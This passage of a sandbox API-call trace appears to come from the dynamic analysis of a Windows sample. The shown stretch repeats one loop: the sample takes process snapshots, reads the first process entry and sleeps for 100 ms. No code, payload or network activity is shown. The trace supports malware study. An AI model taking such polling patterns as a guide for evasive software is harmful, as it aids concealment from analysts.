| out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.622] Sleep (dwMilliseconds=0x64) [0276.705] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0276.773] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.895] Sleep (dwMilliseconds=0x64) [0276.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0276.942] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.018] Sleep (dwMilliseconds=0x64) [0277.095] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0277.105] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.336] Sleep (dwMilliseconds=0x64) [0277.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0277.403] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.479] Sleep (dwMilliseconds=0x64) [0277.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0277.502] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.571] Sleep (dwMilliseconds=0x64) [0277.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0277.635] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.752] Sleep (dwMilliseconds=0x64) [0277.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0277.868] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.028] Sleep (dwMilliseconds=0x64) [0278.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0278.085] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.244] Sleep (dwMilliseconds=0x64) [0278.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0278.313] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.596] Sleep (dwMilliseconds=0x64) [0278.689] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0278.700] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.806] Sleep (dwMilliseconds=0x64) [0278.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0278.822] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.948] Sleep (dwMilliseconds=0x64) [0279.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0279.011] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.167] Sleep (dwMilliseconds=0x64) [0279.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0279.307] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.505] Sleep (dwMilliseconds=0x64) [0279.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0279.620] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.771] Sleep (dwMilliseconds=0x64) [0279.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0279.915] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.035] Sleep (dwMilliseconds=0x64) [0280.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0280.058] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.156] Sleep (dwMilliseconds=0x64) [0280.202] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0280.211] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.365] Sleep (dwMilliseconds=0x64) [0280.399] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0280.409] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.464] Sleep (dwMilliseconds=0x64) [0280.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0280.492] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.838] Sleep (dwMilliseconds=0x64) [0280.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0280.965] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.167] Sleep (dwMilliseconds=0x64) [0281.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0281.204] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.273] Sleep (dwMilliseconds=0x64) [0281.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0281.337] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.454] Sleep (dwMilliseconds=0x64) [0281.506] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0281.518] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.726] Sleep (dwMilliseconds=0x64) [0281.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0281.740] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.816] Sleep (dwMilliseconds=0x64) [0281.878] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0282.160] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.289] Sleep (dwMilliseconds=0x64) [0282.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0282.392] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.566] Sleep (dwMilliseconds=0x64) [0282.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0282.657] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.761] Sleep (dwMilliseconds=0x64) [0282.822] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0282.831] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.959] Sleep (dwMilliseconds=0x64) [0283.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0283.019] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.192] Sleep (dwMilliseconds=0x64) [0283.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0283.250] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.461] Sleep (dwMilliseconds=0x64) [0283.465] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0283.475] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.603] Sleep (dwMilliseconds=0x64) [0283.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0283.668] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.831] Sleep (dwMilliseconds=0x64) [0283.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0283.886] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.971] Sleep (dwMilliseconds=0x64) [0283.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0283.995] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.112] Sleep (dwMilliseconds=0x64) [0284.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0284.212] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.368] Sleep (dwMilliseconds=0x64) [0284.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0284.418] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.536] Sleep (dwMilliseconds=0x64) [0284.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0284.555] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.621] Sleep (dwMilliseconds=0x64) [0284.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0284.683] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.800] Sleep (dwMilliseconds=0x64) [0284.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0284.911] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.028] Sleep (dwMilliseconds=0x64) [0285.045] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0285.055] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.121] Sleep (dwMilliseconds=0x64) [0285.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0285.203] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.392] Sleep (dwMilliseconds=0x64) [0285.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0285.450] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.705] Sleep (dwMilliseconds=0x64) [0285.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0285.735] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.941] Sleep (dwMilliseconds=0x64) [0286.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0286.011] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.127] Sleep (dwMilliseconds=0x64) [0286.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0286.195] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.260] Sleep (dwMilliseconds=0x64) [0286.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0286.313] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.553] Sleep (dwMilliseconds=0x64) [0286.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0286.614] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.823] Sleep (dwMilliseconds=0x64) [0286.850] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0286.867] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.973] Sleep (dwMilliseconds=0x64) [0287.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0287.194] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.268] Sleep (dwMilliseconds=0x64) [0287.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0287.419] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.477] Sleep (dwMilliseconds=0x64) [0287.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0287.492] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.554] Sleep (dwMilliseconds=0x64) [0287.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0287.571] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.635] Sleep (dwMilliseconds=0x64) [0287.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0287.686] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.775] Sleep (dwMilliseconds=0x64) [0287.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0287.884] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.105] Sleep (dwMilliseconds=0x64) [0288.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0288.136] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.225] Sleep (dwMilliseconds=0x64) [0288.270] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0288.416] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.486] Sleep (dwMilliseconds=0x64) [0288.532] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0288.541] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.622] Sleep (dwMilliseconds=0x64) [0288.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0288.759] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.836] Sleep (dwMilliseconds=0x64) [0288.880] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0288.930] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.003] Sleep (dwMilliseconds=0x64) [0289.051] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0289.063] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 